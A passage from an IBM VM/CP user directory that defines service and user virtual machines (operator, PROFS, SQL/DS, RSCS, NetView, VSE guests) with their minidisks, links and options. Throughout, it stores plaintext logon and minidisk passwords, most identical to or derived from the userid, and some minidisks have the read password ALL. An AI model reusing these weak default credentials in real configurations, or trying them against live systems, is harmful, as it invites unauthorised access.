 MDISK 298 3380 005 009 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 299 3380 200 024 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 29A 3380 156 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 29B 3380 224 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 29C 3380 244 005 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 29D 3380 860 020 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
*
* 33F - 5664-289 ACF/SSP Base disk
* 340 - 5664-289 ACF/SSP Delta disk
* 341 - 5664-289 ACF/SSP Merge disk
* 342 - 5664-289 ACF/SSP Zap disk
* 343 - 5664-289 ACF/SSP Run disk
*
 MDISK 33F 3380 687 048 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 340 3380 830 010 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 341 3380 840 020 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 342 3380 249 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 343 3380 110 046 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
*
* 352 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Base disk
* 353 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Delta disk
* 354 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Merge disk
* 355 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Run disk
* 356 - 5735-XXB (EP) - 5668-854 (ACF/NCP) Zap disk
*
 MDISK 352 3380 259 066 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 353 3380 325 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 354 3380 335 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 355 3380 355 088 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 356 3380 443 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
*
* 349 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) VMFPARM DISK
* 357 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Base disk
* 358 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Delta disk
* 359 - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Merge disk
* 35A - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Zap disk
* 35B - 5735-XXB (EP) - 5668-754 (ACF/NCP subset for 3720) Run disk
*
 MDISK 349 3380 003 002 VMGCS1 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 357 3380 453 066 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 358 3380 519 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 359 3380 529 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 35A 3380 637 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 35B 3380 549 088 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
*
* 330 - 5664-204 NETVIEW Base disk
* 331 - 5664-204 NETVIEW Delta disk
* 332 - 5664-204 NETVIEW Merge disk
* 333 - 5664-204 NETVIEW Zap disk
* 334 - 5664-204 NETVIEW Run disk
*
 MDISK 330 3380 735 095 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 331 3380 647 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 332 3380 657 020 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 333 3380 677 010 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
 MDISK 334 3380 014 096 VMGCS1 WR RMAINT   WMAINT   MMAINT             03131808
*
* 29F - 5664-188 RSCSV2 Update files
* 39F - 5664-188 RSCSV2 User exits disk
* 49F - 5664-188 RSCSV2 Text disk
* 59F - 5664-188 RSCSV2 191 disk
*
 MDISK 29F 3380 129 004 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 39F 3380 799 004 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 49F 3380 803 010 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 59F 3380 208 006 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
*
* 322 - 5664-283 VM/IS
* 326 - 5664-283 VM/IS
* 34A - 5668-905 Graphical Display and Query Facility (GDQF)
* 346 - 5668-AAA Query Management Facility (QMF)
* 347 - 5668-AAA Query Management Facility (QMF)
* 360 - 5664-329 Contextual File Search (CFSearch/370)
* 361 - 5664-370 Display Write/370
* 363 - 5668-890 Font Library Service Facility (FLSF)
*
 MDISK 322 3380 734 007 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 326 3380 166 010 VMPK01 MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 34A 3380 164 052 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 346 3380 207 013 SQLPK  MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 347 3380 220 023 SQLPK  MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 360 3380 216 040 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 361 3380 768 027 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
 MDISK 363 3380 795 009 VMSRES MR RMAINT   WMAINT   MMAINT             03131808
*
USER OPERATNS OPERATNS 1M  2M BCEG
INCLUDE EXPPROF
 ACCOUNT 13 SYSPROG
 LINK MAINT 300 300 RR
 LINK MAINT 193 192 RR
 MDISK 191 3380 547 001 VMSRES MR RIPCS    WIPCS    MIPCS              03131808
 MDISK 193 3380 256 008 VMSRES MR RIPCS    WIPCS    MIPCS              03131808
*
USER OPERATOR OPERATOR  3M 16M ABCDEFG
 ACCOUNT 2 OPERATOR
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215 T MAINT
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 LINK MAINT 300 300 RR
 MDISK 191 3380 545 002 VMSRES MR ROPER    WOPER    MOPER              03131808
*
USER SYSDUMP1 SYSDUMP1 1M 1M BG
INCLUDE EXPPROF
 ACCOUNT 16 SYSTEM
 LINK MAINT 300 300 RR
 MDISK 123 3380 000 885 VMSRES RR                                      03131808
 MDISK 124 3380 000 885 VMPK01 RR                                      03131808
 MDISK 126 3380 000 885 VMSTGE RR                                      03131808
 MDISK 127 3380 000 885 VMGCS1 RR                                      03131808
 MDISK 129 3380 000 885 PROFPK RR                                      03131808
 MDISK 130 3380 000 885 SQLPK  RR                                      03131808
 MDISK 131 3380 000 885 VMPK02 RR                                      03131808
 MDISK 191 3380 133 001 VMPK01 MR RSYSDUMP WSYSDUMP MSYSDUMP           03131808
*
USER TSAFVM TSAFVM 4M 8M G
 ACCOUNT 1 XXXXXX
 OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
 IUCV ALLOW
 IUCV *CRM
 IPL CMS PARM AUTOCR
 CONSOLE 009 3215 A OPERATOR
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 LINK MAINT 492 192 RR
 LINK MAINT 494 494 RR
*DEDICATE 300 4A0
 MDISK 191 3380 206 002 VMPK01 MR                                      03131808
*
USER VSEMAINT VSEMAINT 1M 4M BG
INCLUDE EXPPROF
 ACCOUNT 211 DOSSYS
 LINK MAINT 300 300 RR
*LINK MAINT 301 301 RR
 MDISK 191 3380 632 004 VMSRES MR RVSEMAIN WVSEMAIN MVSEMAIN           03131808
*
USER VSEIPO VSEIPO  16M 16M G
*
* SAMPLE USERID TO RUN VSE/EXPRESS/IPO
*
 ACCOUNT 203 VSEIPO
 IPL 224
*OPTION ECMODE BMX REALTIMER VIRT=REAL MAXCONN 050 STF  370E
 OPTION ECMODE BMX REALTIMER  MAXCONN 050
 IUCV *CCS PRIORITY MSGLIMIT 050
 CONSOLE 01F 3270
 SPECIAL 401 3270
 SPECIAL 402 3270
 SPECIAL 403 3270
 SPECIAL 404 3270
 SPECIAL 405 3270
 SPECIAL 406 3270
 SPECIAL 407 3270
 SPECIAL 408 3270
 SPECIAL 409 3270
 SPECIAL 40A 3270
 SPECIAL 40B 3270
 SPECIAL 40C 3270
 SPECIAL 40D 3270
 SPECIAL 40E 3270
 SPECIAL 40F 3270
 SPECIAL 410 3270
 SPECIAL 411 3270
 SPECIAL 412 3270
 SPECIAL 413 3270
 SPECIAL 414 3270
 SPECIAL 415 3270
 SPECIAL 416 3270
 SPECIAL 417 3270
 SPECIAL 418 3270
 SPECIAL 419 3270
 SPECIAL 41A 3270
 SPECIAL 41B 3270
 SPECIAL 41C 3270
 SPECIAL 41D 3270
 SPECIAL 41E 3270
 SPECIAL 41F 3270
 SPOOL 00C 3505 A
 SPOOL 00D 3525 A
 SPOOL 00E 3203 A
 SPOOL 05D 3525 A
 SPOOL 05E 1403 A
 DEDICATE  300  400
 DEDICATE  080  080
 LINK MAINT 190 190 RR
 LINK MAINT 19E 19E RR
 LINK VSEMAINT 191 191 RR
* 3380 SYSTEM
*MDISK 150 3380 000 885 DOSRES MR VSEIPO  VSEIPO
*MDISK 151 3380 000 885 SYSWK1 MR VSEIPO  VSEIPO
*MDISK 152 3380 000 885 SYSWK2 MR VSEIPO  VSEIPO
* 3375 SYSTEM
*MDISK 140 3375 000 959 DOSRES MR VSEIPO  VSEIPO
*MDISK 141 3375 000 959 SYSWK1 MR VSEIPO  VSEIPO
*MDISK 142 3375 000 959 SYSWK2 MR VSEIPO  VSEIPO
* FB-512 SYSTEM
*MDISK 240 FB-512 00000 558000 DOSRES MR VSEIPO VSEIPO
*MDISK 241 FB-512 00000 558000 SYSWK1 MR VSEIPO VSEIPO
*MDISK 242 FB-512 00000 558000 SYSWK2 MR VSEIPO VSEIPO
* 3350 SYSTEM
 MDISK 220 3350 000 555 SYSWKB MR VSE220  VSE0WO
 MDISK 222 3350 000 555 SYSWK2 MR VSE222  VSE2WO
 MDISK 223 3350 000 555 SYSWK4 MR VSE223  VSE3WO
 MDISK 224 3350 000 555 DOSRES MR VSE224  VSE4WO
 MDISK 225 3350 000 555 SYSWK1 MR VSE225  VSE5WO
* 3380 SYSTEM
 MDISK 200 3380 000 885 SYSWKA MR VSE219  VSEAWO
*
USER ROUTER ROUTER 512K 2M G 64 ON ON ON ON
INCLUDE EXPPROF
 ACCOUNT 46 ROUTER
 MDISK 191 3380 636 003 VMSRES MR RROUTER  WROUTER  MROUTER            03131808
*
USER AP2SVP AP2SVP 512K 8M EG 64 ON ON ON ON
*
* 5668899 APL2 SERVICE MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 9999 APL2-SVP
 MDISK 191 3380 731 003 VMPK01 MR RAP2SVP  WAP2SVP  MAP2SVP            03131808
*
USER APL2PP APL2PP 3M 16M BEG 64 ON ON ON ON
*
* 5668899 APL2
*
INCLUDE EXPPROF
 ACCOUNT 9999 I5668899
 MDISK 191 3380 264 044 VMSRES MR ALL      WAPL2PP                     03131808
*
USER VMASSYS VMASSYS 16M 16M EG 64 ON ON ON ON
*
* 5767032 AS
*
INCLUDE EXPPROF
 ACCOUNT 15 SYSTEM
 LINK ISPVM 192 192 RR
 LINK SQLDBA 195 195 RR
 MDISK 191 3380 569 018 VMPK01 MR RVMASSYS WVMASSYS INSTALL            03131808
 MDISK 391 3380 587 095 VMPK01 MR RVMASSYS WVMASSYS SYSTEM             03131808
 MDISK 392 3380 682 005 VMPK01 MR RVMASSYS WVMASSYS TEST               03131808
 MDISK 393 3380 687 026 VMPK01 MR RVMASSYS WVMASSYS IPCS               03131808
*
USER VMASMON VMASMON 2M 2M G 64 ON ON ON ON
*
* 5767032 AS
*
INCLUDE EXPPROF
 ACCOUNT 15 SYSTEM
 OPTION MAXCONN 20
 IUCV ALLOW
 LINK VMASSYS 191 390 RR
 LINK VMASSYS 391 391 RR
 MDISK 191 3380 567 002 VMPK01 MR RVMASMON WVMASMON MVMASMON           03131808
*
USER VMASTEST VMASTEST 2M 2M G 64 ON ON ON ON
*
* 5767032 AS
*
INCLUDE EXPPROF
 ACCOUNT 15 SYSTEM
 LINK VMASSYS 391 391 RR
 LINK VMASSYS 392 392 RR
 MDISK 191 3380 713 018 VMPK01 MR RVMASTES WVMASTES MVMASTES           03131808
*
USER BATCH BATCH 2M 2M ABEG 64 ON ON ON ON
*
* 5664364 VM BATCH FACILITY
*
INCLUDE EXPPROF
 ACCOUNT 999
 IUCV ALLOW
 OPTION BMX MAXCONN 256
 MDISK 191 3380 741 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
 MDISK 193 3380 744 020 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
 MDISK 194 3380 764 003 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
 MDISK 199 3380 767 002 VMPK01 RR RVMBATCH WVMBATCH MVMBATCH           03131808
 MDISK 195 3380 769 002 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
*
USER BATCH1 BATCH1 2M 4M G 64 ON ON ON ON
*
* 5664364 VM BATCH FACILITY TEST USERID
*
INCLUDE EXPPROF
 ACCOUNT 999
 MDISK 191 3380 771 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
*
USER BATCH2 BATCH2 2M 4M G 64 ON ON ON ON
*
* 5664364 VM BATCH FACILITY TEST USERID
*
INCLUDE EXPPROF
 ACCOUNT 999
 MDISK 191 3380 776 005 VMPK01 MR RVMBATCH WVMBATCH MVMBATCH           03131808
*
* USER CSPUSER CSPUSER 2M 4M G 64 ON ON ON ON
*
* 5668814 CSP
*
* INCLUDE EXPPROF
* ACCOUNT 101
* MDISK 191 3380 134 032 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
* MDISK 193 3380 519 008 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
* MDISK 502 3380 527 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
* MDISK 503 3380 547 020 VMPK01 MR RCSPUSER WCSPUSER MCSPUSER          03131808
*
USER CVIEW CVIEW 2M 2M G 64 ON ON ON ON
*
* 5664296 CVIEW
*
INCLUDE EXPPROF
 ACCOUNT 15 SYSTEM
 OPTION BMX
 LINK MAINT 193 193 RR
 MDISK 191 3380 732 004 VMSRES MR RCVIEW   WCVIEW                      03131808
*
USER DIRMAINT DIRMAINT 1M 2M BG 64 ON ON ON ON
*
* 5748XE4 DIRMAINT
*
INCLUDE EXPPROF
 ACCOUNT 7 SYSADMIN
 OPTION REALTIME ECMODE
 MDISK 191 3380 191 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
 MDISK 193 3380 001 009 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
 MDISK 195 3380 049 009 VMSRES MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
 MDISK 294 3380 844 004 VMPK01 MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
 MDISK 394 3380 226 019 VMSTGE MR RDIRMAIN WDIRMAIN MDIRMAIN           03131808
 MDISK 123 3380 000 885 VMSRES MW                                      03131808
*
USER DATAMOVE DATAMOVE 1M 1M G 64 ON ON ON ON
*
* 5748XE4 DATAMOVE MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 5 SYSADMIN
 OPTION ACCT ECMODE
 LINK DIRMAINT 191 193 RR
 LINK MAINT    193 192 RR
 MDISK 191 3380 178 003 VMPK01 MR RDATAMOV WDATAMOV MDATAMOV           03131808
*
USER FSFCNTRL FSFCNTRL 2M 16M ABG 64 ON ON ON ON
*
* 5798DMY FILE STORAGE CONTROL MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION ECMODE BMX MAXCONN 256
 IUCV ALLOW PRIORITY MSGLIMIT 255
 LINK FSFADMIN 192 198 RR
 MDISK 191 3380 143 007 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 192 3380 141 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 193 3380 150 002 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 194 3380 152 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 195 3380 153 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 197 3380 154 001 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 200 3380 155 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 201 3380 160 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 400 3380 165 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
 MDISK 401 3380 170 005 VMPK02 MR RFSFCNTR WFSFCNTR MFSFCNTR           03131808
*
USER FSFTASK1 FSFTASK1 1M 1M G 64 ON ON ON ON
*
* 5798DMY FILE STORAGE TASK MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION BMX MAXCONN 2
 IUCV ALLOW PRIORITY MSGLIMIT 255
 LINK FSFCNTRL 191 191 RR
*
USER FSFTASK2 FSFTASK2 1M 1M G 64 ON ON ON ON
*
* 5798DMY FILE STORAGE TASK MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION BMX MAXCONN 2
 IUCV ALLOW PRIORITY MSGLIMIT 255
 LINK FSFCNTRL 191 191 RR
*
USER FSFADMIN FSFADMIN 1M 1M G 64 ON ON ON ON
*
* 5798DMY FILE STORAGE ADMINISTRATOR
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION BMX MAXCONN 2
 IUCV ALLOW PRIORITY MSGLIMIT 255
 LINK MAINT 319 319 RR
 MDISK 192 3380 175 003 VMPK02 MR RFSFADMI WFSFADMI MFSFADMI           03131808
*
USER IIPS IIPS 2M 4M G 64 ON ON ON ON
*
* 5668012 IIPS
*
INCLUDE EXPPROF
 ACCOUNT 8 INSTR
 MDISK 191 3380 736 013 VMSRES MR RIIPS    WIIPS    MIIPS              03131808
 MDISK 193 3380 749 019 VMSRES MR RIIPS    WIIPS    MIIPS              03131808
*
USER ADMIN ADMIN 1664K 16M ABCDEFG 64 ON ON ON ON
*
* 5664318 VM/IPF
*
INCLUDE EXPPROF
 LINK MAINT 300 300 RR
 MDISK 191 3380 781 001 VMPK01 MR RADMIN   WADMIN   MADMIN             03131808
*
USER DISKACNT DISKACNT 512K 2M G 64 ON ON ON ON
*
* 5664318 VM/IPF
*
INCLUDE EXPPROF
 OPTION ECMODE
 LINK MAINT 300 300 RR
 MDISK 191 3380 010 002 VMPK01 MR RDISKACN WDISKACN MDISKACN           03131808
*
USER CPRM CPRM 512K 1M G 64 ON ON ON ON
*
* 5664318 VM/IPF
*
INCLUDE EXPPROF
 LINK OPERATNS 193 193 RR
 MDISK 191 3380 783 001 VMPK01 MR RCPRM    WCPRM    MCPRM              03131808
 MDISK 192 3380 098 007 VMSRES MR ALL      WCPRM    MCPRM              03131808
 MDISK 291 3380 784 001 VMPK01 MR RCPRM    WCPRM    MCPRM              03131808
*
USER OP1 OP1 1M 13M ABCDEFG 64 ON ON ON ON
*
* 5664318 VM/IPF
*
INCLUDE EXPPROF
 LINK MAINT 300 300 RR
 MDISK 191 3380 058 001 VMSRES MR ROP1     WOP1     MOP1               03131808
*
USER VMUTIL VMUTIL 512K 2M ABDEG 64 ON ON ON ON
*
* 5664318 VM/IPF
*
INCLUDE EXPPROF
 IPL CMS
 OPTION ECMODE
 LINK MAINT 300 300 RR
 MDISK 191 3380 059 001 VMSRES MR RVMUTIL  WVMUTIL  MVMUTIL            03131808
*
USER IPFSERV IPFSERV 2M 16M G 64 ON ON ON ON
*
* 5664318 VM/IPF
*
 IPL CMS
 CONSOLE 009 3215 T MAINT
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH  A
 SPOOL 00E 1403 A
 LINK MAINT 123 123 MW
 LINK MAINT 190 190 RR
 LINK MAINT 191 192 RR
 LINK MAINT 193 193 RR
 LINK MAINT 194 194 RR
 LINK MAINT 19D 19D RR
 LINK MAINT 19E 19E RR
 LINK MAINT 294 294 RR
 LINK MAINT 295 295 RR
 LINK MAINT 300 300 RR
 MDISK 191 3380 060 001 VMSRES MR RIPFSERV WIPFSERV MIPFSERV           03131808
*
USER ISPVM ISPVM 1M 10M EG 64 ON ON ON ON
*
* 5664282 ISPF
*
INCLUDE EXPPROF
 ACCOUNT 104 USER04
 MDISK 191 3380 548 005 VMSRES MR RISPVM   WISPVM   MISPVM             03131808
 MDISK 192 3380 110 054 VMSRES MR RISPVM   WISPVM   MISPVM             03131808
*
USER NETVIEW NETVIEW 5M 16M G 64 ON ON ON ON
*
* 5664175 NETVIEW
*
 ACCOUNT NETVIEW GCS
 OPTION ECMODE
 IUCV ANY P M 0
 IUCV *LOGREC
 IPL GCS PARM AUTOLOG
 CONSOLE 01F 3215
 SPOOL 00C 2540 READER A
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 334 191 RR
 LINK VTAM  191 291 RR
 LINK VTAM  29A 29A RR
 LINK MAINT 595 595 RR
 MDISK 198 3380 166 034 VMGCS1 WR RNETVIEW WNETVIEW MNETVIEW           03131808
*
USER PRODBM PRODBM 1M 4M G 64 ON ON ON ON
*
* 5664309 PROFS DATABASE MANAGER
*
INCLUDE EXPPROF
 ACCOUNT 250 PRODBM
 OPTION MAXCONN 2000
 IUCV ALLOW
 LINK SYSADMIN 399 399 RR
 MDISK 161 3380 169 011 PROFPK MR RDBM     WDBM     MDBM               03131808
 MDISK 191 3380 165 004 PROFPK MR RDBM     WDBM     MDBM               03131808
 MDISK 5FD 3380 206 013 PROFPK MR RDBM     WDBM     MDBM               03131808
 MDISK 5FE 3380 193 013 PROFPK MR RDBM     WDBM     MDBM               03131808
 MDISK 5FF 3380 180 013 PROFPK MR RDBM     WDBM     MDBM               03131808
*
USER PROMAIL PROMAIL 1M 2M G 64 ON ON ON ON
*
* 5664309 PROFS DISTRIBUTION MANAGER
*
INCLUDE EXPPROF
 ACCOUNT 250 PROMAIL
 LINK PRODBM   191 395 RR
 LINK SYSADMIN 399 399 RR
 MDISK 151 3380 092 004 PROFPK MR RMAIL    WMAIL    MMAIL              03131808
 MDISK 191 3380 084 008 PROFPK MR RMAIL    WMAIL    MMAIL              03131808
*
USER PROCAL PROCAL 1M 4M G 64 ON ON ON ON
*
* 5664309 PROFS CALENDAR MANAGER
*
INCLUDE EXPPROF
 ACCOUNT 250 PROCAL
 LINK PRODBM   191 395 RR
 LINK SYSADMIN 398 398 RR
 LINK SYSADMIN 399 399 RR
 MDISK 191 3380 096 004 PROFPK MR RCAL     WCAL     MCAL               03131808
 MDISK 5FB 3380 100 013 PROFPK MR RCAL     WCAL     MCAL               03131808
 MDISK 5FC 3380 113 013 PROFPK MR RCAL     WCAL     MCAL               03131808
 MDISK 5FD 3380 126 013 PROFPK MR RCAL     WCAL     MCAL               03131808
 MDISK 5FE 3380 139 013 PROFPK MR RCAL     WCAL     MCAL               03131808
 MDISK 5FF 3380 152 013 PROFPK MR RCAL     WCAL     MCAL               03131808
*
USER SYSADMIN NOLOG 1M 16M EG 64 ON ON ON ON
*
* 5664309 PROFS ADMINISTRATOR
*
INCLUDE EXPPROF
 ACCOUNT 250 SYSADMIN
 LINK PRODBM   161 161 RR
 LINK PRODBM   191 4FA RR
 LINK PRODBM   5FD 5FD RR
 LINK PRODBM   5FE 5FE RR
 LINK PRODBM   5FF 5FF RR
 MDISK 191 3380 001 011 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
 MDISK 298 3380 012 029 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
 MDISK 398 3380 041 019 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
 MDISK 399 3380 060 024 PROFPK MR RADMIN   WADMIN   MADMIN             03131808
 MDISK 397 3380 219 002 PROFPK MR ALL      WADMIN   MADMIN             03131808
*
USER SFCM1 SFCM1 3M 5M BDG 64 ON ON ON ON
*
* 5664198 PSF
*
INCLUDE EXPPROF
 ACCOUNT 100 PSF
 OPTION ACCT
 IUCV *SPL
 LINK PDM470 191 193 RR
 LINK PDMREM1 191 194 RR
 LINK PSFMAINT 191 291 RR
 LINK PSFMAINT 193 293 RR
 LINK PSFMAINT 194 294 RR
 MDISK 191 3380 839 020 VMSRES MR RSFCM1   WSFCM1                      03131808
*
USER PSFMAINT PSFMAINT 3M 16M ABCDEFG 64 ON ON ON ON
*
* 5664198 PSF MAINTENANCE
*
INCLUDE EXPPROF
 ACCOUNT 1 SYSPROG
 MDISK 191 3380 814 011 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
 MDISK 193 3380 825 004 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
 MDISK 194 3380 829 010 VMSRES MR RPSFMAIN WPSFMAIN                    03131808
*
USER PDM470 PDM470 4M 5M BG 64 ON ON ON ON
*
* 5664198 PSF 3800 PDM
*
INCLUDE EXPPROF
 ACCOUNT 100 PSF
 OPTION ACCT
 IUCV *SPL
*DEDICATE 470 470
 LINK SFCM1 191 193 RR
 LINK PSFMAINT 191 291 RR
 LINK PSFMAINT 194 294 RR
 MDISK 191 3380 809 005 VMSRES MR RPDM470  WPDM470                     03131808
*
USER PDMREM1 PDMREM1 4M 5M BG 64 ON ON ON ON
*
* 5664198 PSF 3820 PDM
*
 ACCOUNT 100 PSF
 OPTION ACCT ECMODE
 IPL GCS PARM AUTOLOG
 IUCV *SPL
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 19E 19E RR
 LINK MAINT 595 595 RR
 LINK SFCM1 191 193 RR
 LINK PSFMAINT 191 291 RR
 LINK PSFMAINT 194 294 RR
 MDISK 191 3380 804 005 VMSRES MR RPDMREM1 WPDMREM1                    03131808
*
USER PVM PVM 1024K 2M BG 50 ON ON ON ON
*
* 5748RC1 VM PASS-THROUGH FACILITY
*
INCLUDE EXPPROF
 OPTION ECMODE
 LINK MAINT 193 193 RR
 LINK MAINT 36E 191 MR
*
USER RSCS RSCS 1M 2M BG 64 ON ON ON ON
*
* 5748XP1 RSCS V1
*
 ACCOUNT 15 SYSTEM
 OPTION ACCT ECMODE
 IPL 191
 CONSOLE 009 3215
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 193 193 RR
 LINK MAINT 19E 19E RR
 LINK MAINT 19D 19D RR
 LINK MAINT 49E 49E RR
 MDISK 191 3380 105 002 VMSRES MR RRSCS    WRSCS    MRSCS              03131808
*
USER RSCSV2 RSCSV2 2M 4M BG 64 ON ON ON ON
*
* 5664188 RSCS (VERSION 2)
*
 ACCOUNT 15 SYSTEM
 OPTION ECMODE ACCT BMX VCUNOSHR
 IPL GCS PARM AUTOLOG
 CONSOLE 01F 3215 T OPERATOR
 SPOOL 00C 2540 READER A
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 595 595 RR
 LINK MAINT 59F 191 RR
*
USER SMART SMART 2048K 2M CEG 64 ON ON ON ON
*
* 5796PNA VM REAL TIME MONITOR SYSTEM
*
INCLUDE EXPPROF
 ACCOUNT 999
 LINK MAINT 319 319 RR
 MDISK 191 3380 848 026 VMPK01 MR RSMART   WSMART   MSMART             03131808
*
USER SQLDBA SQLDBA 6M 6M G 64 ON OFF OFF \n*
* 5748XXJ SQL/DS ADMINISTRATOR
*
 ACCOUNT 26
 OPTION MAXCONN 25
 IUCV ALLOW
 IUCV *IDENT SQLDBA GLOBAL
 IPL CMS
 CONSOLE 009 3215 T OPERATOR
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403
 LINK MAINT 190 190 RR
 LINK MAINT 19D 19D RR
 MDISK 191 3380 001 010 SQLPK  W                                       03131808
 MDISK 193 3380 011 035 SQLPK  R  RSQL     WSQL                        03131808
 MDISK 195 3380 046 013 SQLPK  RR RSQL     WSQL     MSQL               03131808
 MDISK 200 3380 059 034 SQLPK  R  RSQL     WSQL                        03131808
 MDISK 201 3380 093 011 SQLPK  R  RSQL     WSQL                        03131808
 MDISK 202 3380 104 100 SQLPK  R  RSQL     WSQL                        03131808
*
USER SQLUSER SQLUSER 2M 2M G 64 ON ON ON ON
*
* 5748XXJ SQL/DS USER MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 27
 OPTION REALTIMER
 IUCV SQLDBA
 LINK SQLDBA 195 195 RR
 MDISK 191 3380 204 003 SQLPK  W                                       03131808
*
USER VMARCH VMARCH 2M 4M BEG 64 ON ON ON ON
*
* 5664291 VMBACKUP
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION ACCT ECMODE
 LINK MAINT 123 1A0 RR
 MDISK 191 3380 001 011 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
 MDISK 193 3380 012 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
 MDISK 100 3380 019 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
